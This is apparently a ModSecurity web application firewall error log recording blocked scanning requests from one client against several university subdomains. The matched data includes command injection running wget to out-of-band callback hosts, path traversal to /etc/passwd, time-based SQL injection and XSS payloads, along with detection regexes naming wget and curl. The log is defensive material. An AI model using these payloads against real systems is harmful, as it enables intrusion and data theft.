[Tue Aug 29 11:48:59.431999 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAkksQIAAAAA"]
[Tue Aug 29 11:48:59.434834 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14u8Co-f0AAAmHd5IAAAAz"]
[Tue Aug 29 11:49:02.386918 2023] [:error] [pid 2441] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gguyszamffczth.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAmJYWEAAAAP"]
[Tue Aug 29 11:49:02.389358 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gty4z31w6ws967.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAlL7EEAAAAq"]
[Tue Aug 29 11:49:02.389910 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26g5rsthfdrow8st.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAmIbLQAAAAo"]
[Tue Aug 29 11:49:02.417705 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gpgfr4okmtoi9d.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAk2KZsAAAAb"]
[Tue Aug 29 11:49:02.426448 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gdngyufi7cdqh3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAlFH8EAAAAk"]
[Tue Aug 29 11:49:03.519894 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gexryacpwj98b1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14v8Co-f0AAAhujDsAAAAr"]
[Tue Aug 29 11:49:04.452428 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAfWN9wAAAAL"]
[Tue Aug 29 11:49:04.458939 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAlV8DgAAAA1"]
[Tue Aug 29 11:49:04.465313 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAk7QMEAAAAi"]
[Tue Aug 29 11:49:04.466283 2023] [:error] [pid 2442] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wMCo-f0AAAmKK@EAAAAI"]
[Tue Aug 29 11:49:04.477281 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAlQ3tgAAAAw"]
[Tue Aug 29 11:49:04.487683 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAltVaMAAAAR"]
[Tue Aug 29 11:49:05.416131 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAl4sUQAAAAf"]
[Tue Aug 29 11:49:05.422915 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAlUlggAAAA0"]
[Tue Aug 29 11:49:05.451534 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAjYrGEAAAAK"]
[Tue Aug 29 11:49:05.459812 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAj12KMAAAAa"]
[Tue Aug 29 11:49:05.468864 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAlV8DsAAAA1"]
[Tue Aug 29 11:49:05.470785 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wcCo-f0AAAkqHvEAAAAM"]
[Tue Aug 29 11:49:08.431529 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAlV8EIAAAA1"]
[Tue Aug 29 11:49:08.438023 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAkmTjIAAAAF"]
[Tue Aug 29 11:49:08.460872 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAkmTjMAAAAF"]
[Tue Aug 29 11:49:08.476845 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAmOBZQAAAAU"]
[Tue Aug 29 11:49:08.505675 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAhujEQAAAAr"]
[Tue Aug 29 11:49:09.401657 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAltVaoAAAAR"]
[Tue Aug 29 11:49:09.429570 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAlPmv8AAAAv"]
[Tue Aug 29 11:49:09.436375 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAluT20AAAAe"]
[Tue Aug 29 11:49:09.439201 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAkGCacAAAAE"]
